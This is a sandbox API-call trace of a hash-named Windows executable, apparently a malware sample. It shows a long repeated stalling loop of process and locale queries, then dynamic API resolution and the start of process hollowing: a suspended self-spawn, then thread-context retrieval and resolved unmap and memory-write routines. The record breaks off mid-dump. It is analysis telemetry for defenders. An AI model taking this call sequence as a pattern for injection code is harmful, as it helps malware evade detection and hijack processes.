GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.357] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.357] GetSystemDefaultLangID () returned 0x230409 [0064.357] GetThreadLocale () returned 0x409 [0064.357] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.358] GetSystemDefaultLangID () returned 0x230409 [0064.358] GetThreadLocale () returned 0x409 [0064.358] GetCurrentProcess () returned 0xffffffff [0064.358] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.359] GetCurrentProcess () returned 0xffffffff [0064.359] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.359] GetSystemDefaultLangID () returned 0x230409 [0064.359] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.360] GetSystemDefaultLangID () returned 0x230409 [0064.360] GetThreadLocale () returned 0x409 [0064.360] GetCurrentProcess () returned 0xffffffff [0064.360] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.361] GetThreadLocale () returned 0x409 [0064.361] GetCurrentProcess () returned 0xffffffff [0064.361] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.361] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.362] GetCurrentProcess () returned 0xffffffff [0064.362] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.362] GetSystemDefaultLangID () returned 0x230409 [0064.362] GetThreadLocale () returned 0x409 [0064.363] GetCurrentProcess () returned 0xffffffff [0064.363] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.363] GetSystemDefaultLangID () returned 0x230409 [0064.363] GetThreadLocale () returned 0x409 [0064.363] GetCurrentProcess () returned 0xffffffff [0064.363] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.363] GetSystemDefaultLangID () returned 0x230409 [0064.363] GetThreadLocale () returned 0x409 [0064.363] GetCurrentProcess () returned 0xffffffff [0064.363] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.363] GetSystemDefaultLangID () returned 0x230409 [0064.363] GetThreadLocale () returned 0x409 [0064.363] GetCurrentProcess () returned 0xffffffff [0064.363] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.363] GetSystemDefaultLangID () returned 0x230409 [0064.363] GetThreadLocale () returned 0x409 [0064.363] GetCurrentProcess () returned 0xffffffff [0064.364] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.364] GetSystemDefaultLangID () returned 0x230409 [0064.364] GetThreadLocale () returned 0x409 [0064.364] GetCurrentProcess () returned 0xffffffff [0064.364] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.364] GetSystemDefaultLangID () returned 0x230409 [0064.364] GetThreadLocale () returned 0x409 [0064.364] GetCurrentProcess () returned 0xffffffff [0064.364] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.364] GetSystemDefaultLangID () returned 0x230409 [0064.364] GetThreadLocale () returned 0x409 [0064.364] GetCurrentProcess () returned 0xffffffff [0064.364] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.364] GetSystemDefaultLangID () returned 0x230409 [0064.364] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.365] GetSystemDefaultLangID () returned 0x230409 [0064.365] GetThreadLocale () returned 0x409 [0064.365] GetCurrentProcess () returned 0xffffffff [0064.365] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.366] GetSystemDefaultLangID () returned 0x230409 [0064.366] GetThreadLocale () returned 0x409 [0064.366] GetCurrentProcess () returned 0xffffffff [0064.366] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.367] GetSystemDefaultLangID () returned 0x230409 [0064.367] GetThreadLocale () returned 0x409 [0064.367] GetCurrentProcess () returned 0xffffffff [0064.367] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.367] GetSystemDefaultLangID () returned 0x230409 [0064.367] GetThreadLocale () returned 0x409 [0064.367] GetCurrentProcess () returned 0xffffffff [0064.367] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0064.367] GetSystemDefaultLangID () returned 0x230409 [0064.367] GetThreadLocale () returned 0x409 [0065.252] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0065.252] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0065.252] VirtualProtect (in: lpAddress=0x2540020, dwSize=0x91090, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0065.359] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0065.359] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0065.359] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0065.360] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0065.360] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0065.360] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0065.360] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0065.360] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0065.360] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0065.362] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0065.364] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3d90000 [0065.438] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0065.439] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0065.439] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0065.439] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0065.439] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0065.440] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0065.441] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0065.441] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0065.441] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0065.441] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0065.456] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0065.461] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0065.461] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0065.462] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0065.462] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0065.462] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0065.462] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0065.462] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0065.462] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0065.462] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0065.462] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0065.462] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.464] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.464] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0065.464] RegisterClassExA (param_1=0x18e260) returned 0x25c1d0 [0065.467] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x601fe [0066.892] PostMessageA (hWnd=0x601fe, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0066.892] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0066.893] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0066.893] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x390000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0066.894] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0066.894] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" " [0066.894] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" ", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xf20, dwThreadId=0xf24)) returned 1 [0066.909] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.910] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0066.910] GetThreadContext (in: hThread=0x74, lpContext=0x390000 | out: lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), 